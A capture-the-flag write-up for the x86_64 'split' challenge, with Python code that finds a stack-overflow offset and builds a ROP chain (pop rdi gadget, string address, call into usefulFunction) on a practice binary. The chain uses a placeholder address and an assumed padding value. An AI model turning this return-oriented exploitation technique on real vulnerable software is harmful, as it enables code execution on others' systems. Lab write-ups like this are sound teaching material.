# Split

## x86_64

This challenge is similar to ret2win, but the function we return to does not read the flag on its own: we have to pass it the argument "/bin/cat flag.txt" ourselves.

#### Determining the buffer size

As in the first challenge, we'll use pwndbg and a cyclic pattern to determine how many bytes separate the start of the buffer from the saved return address.

<figure><img src="/files/Vf4F5UndYyGw4NF48BAJ" alt=""><figcaption><p>Determining the size of the buffer</p></figcaption></figure>

<figure><img src="/files/nzJqsP5HYMMRJgw8YPIa" alt=""><figcaption><p>Size of the buffer</p></figcaption></figure>
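The cyclic-pattern step above is shown only in screenshots, so here is an added example (not code from the original page or from pwndbg/pwntools) that implements the same idea in plain Python: generate a de Bruijn pattern in which every 4-byte window is unique, feed it as the input, and map the value that lands in the crashed register (or at the top of the stack) back to its offset. The 32-byte buffer and 8-byte saved RBP used in `demo_frame_offset` are a constructed model of a stack frame, not values taken from the split binary.

```python
"""De Bruijn cyclic pattern generator and offset lookup (added example)."""
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase


def de_bruijn(alphabet: str = ALPHABET, n: int = 4):
    """Lazily yield a de Bruijn sequence B(k, n): every n-char window is unique.

    Standard FKM construction; generation stops as soon as the caller stops
    consuming, so long patterns cost nothing beyond the bytes actually used.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in a[1:p + 1]:
                    yield alphabet[i]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """Return the first `length` bytes of the pattern (like pwntools' cyclic)."""
    return "".join(itertools.islice(de_bruijn(ALPHABET, n), length)).encode()


def cyclic_find(needle, n: int = 4, max_length: int = 0x10000) -> int:
    """Map a register/stack value back to its offset in the pattern.

    `needle` may be bytes, str, or an int read from a register; for an int the
    value is packed little-endian (as it sits in memory) and only the first n
    bytes are matched, so an 8-byte RSP/RIP value works directly.
    Returns -1 if the value is not part of the pattern.
    """
    if isinstance(needle, int):
        needle = struct.pack("<Q", needle)
    if isinstance(needle, str):
        needle = needle.encode()
    return cyclic(max_length, n).find(needle[:n])


def demo_frame_offset(buffer_size: int = 32, saved_rbp: int = 8) -> int:
    """Constructed model of an overflow: a buffer followed by saved RBP and the
    saved return address. Overwrite the frame with the pattern, read back the
    qword that overwrote the return address, and recover the padding length."""
    pattern = cyclic(buffer_size + saved_rbp + 8 + 64)
    ret_slot = buffer_size + saved_rbp          # where the return address lives
    clobbered = struct.unpack("<Q", pattern[ret_slot:ret_slot + 8])[0]
    return cyclic_find(clobbered)               # should equal ret_slot


if __name__ == "__main__":
    print(cyclic(40))
    print("offset to return address:", demo_frame_offset())
```

The offset returned by `cyclic_find` is the amount of padding to place before the ROP chain; everything after that padding overwrites the saved return address and the stack slots above it.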

#### Locating gadgets

Because this challenge requires us to pass an argument to the function, we'll have to locate a few more pieces to make this work. Under the x86_64 System V calling convention the first argument is passed in RDI, so we need a gadget that pops a value into RDI, the address of the argument string itself, and the address of the function "usefulFunction".

Starting with the location of the function, you can use radare2's `afl` command to list all defined functions in the program.

<figure><img src="/files/a7VVU3eWzjeiRrC0cyzC" alt=""><figcaption><p>usefulFunction location</p></figcaption></figure>

Disassembling this function shows that, when called, it runs "/bin/ls" rather than the command we want.

<figure><img src="/files/ZLG9sg1Lxkefp9TQTIqL" alt=""><figcaption><p>Contents of usefulFunction</p></figcaption></figure>

Because of this, we need a gadget that pops a value into RDI, so that we can place the address of '/bin/cat flag.txt' in that register before the call. This gadget can be located by running ropper and grepping its output for rdi, which gives us the `pop rdi; ret` gadget at 0x4007c3.

<figure><img src="/files/9qpHk7LtaEY4w67daagK" alt=""><figcaption><p>pop RDI gadget</p></figcaption></figure>

The final address we need is that of the string '/bin/cat flag.txt'. Running the `iz` command in radare2 lists the strings in the program's data sections and gives us the address 0x601060.

<figure><img src="/files/u3Y92bTDo0vjr9pmPLHx" alt=""><figcaption><p>Location of string</p></figcaption></figure>

#### Creating the exploit

Combining everything we've located allows us to run '/bin/cat flag.txt' instead of '/bin/ls'. We start by overflowing the buffer up to the saved return address, then return into the `pop rdi; ret` gadget. This lets us load whatever value we want into RDI; in this case, the next qword on the stack is the address of the string '/bin/cat flag.txt'. After this, the gadget's `ret` takes us to the address of the syscall located within usefulFunction, which now runs with our argument.

<figure><img src="/files/ySPq4oy8ZkcyxrJi6L7D" alt=""><figcaption><p>Exploit used</p></figcaption></figure>
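The exploit itself is only shown as a screenshot above, so here is an added example (not the original page's script) that lays out the chain described in the text as a byte string and decodes it again qword by qword, which is also how you would read such a payload back out of a crash dump or a captured input. The gadget address 0x4007c3 and the string address 0x601060 are the values the page reports; `PADDING` is an assumed offset standing in for the value read off the cyclic screenshot, and `USEFUL_CALL_ADDR` is a placeholder for the call address inside usefulFunction, which the text does not state.

```python
"""ROP chain layout for split (x86_64), added example with assumed values."""
import struct

POP_RDI_RET = 0x4007C3        # "pop rdi; ret" gadget reported by ropper (from the page)
CAT_FLAG_STR = 0x601060       # address of "/bin/cat flag.txt" from radare2 iz (from the page)
USEFUL_CALL_ADDR = 0xDEADBEEF # PLACEHOLDER: call site inside usefulFunction, not given in the text
PADDING = 40                  # ASSUMED: bytes from buffer start to the saved return address


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian qword, as it is laid out on the stack."""
    return struct.pack("<Q", value)


def build_chain(padding: int = PADDING, pop_rdi: int = POP_RDI_RET,
                arg: int = CAT_FLAG_STR, call: int = USEFUL_CALL_ADDR) -> bytes:
    """Lay out the stack as the text describes, lowest address first:

        [padding][pop rdi; ret][&"/bin/cat flag.txt"][call inside usefulFunction]

    When the vulnerable function returns, RIP becomes the gadget; its "pop rdi"
    consumes the string address into RDI and its "ret" consumes the final qword.
    """
    return b"A" * padding + p64(pop_rdi) + p64(arg) + p64(call)


def decode_chain(payload: bytes, padding: int = PADDING) -> list:
    """Split everything past the padding into qwords for inspection."""
    tail = payload[padding:]
    if len(tail) % 8:
        raise ValueError("chain is not qword-aligned")
    return [struct.unpack("<Q", tail[i:i + 8])[0] for i in range(0, len(tail), 8)]


def describe_chain(payload: bytes, padding: int = PADDING) -> list:
    """Label each qword by the role it plays in this particular chain."""
    roles = ["return address -> pop rdi; ret",
             "popped into RDI (first argument)",
             "ret target -> call inside usefulFunction"]
    return [(f"{q:#018x}", roles[i] if i < len(roles) else "extra")
            for i, q in enumerate(decode_chain(payload, padding))]


if __name__ == "__main__":
    chain = build_chain()
    for addr, role in describe_chain(chain):
        print(addr, role)
```

The order matters: the gadget address must sit exactly at the saved return address slot, and the string address must directly follow it, because `pop rdi` reads from wherever RSP points after the `ret` that entered the gadget.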

Running the script against the binary prints the contents of flag.txt to the terminal.

<figure><img src="/files/TmAR3nR9MdveuL7AC7Ro" alt=""><figcaption><p>Contents of flag.txt</p></figcaption></figure>
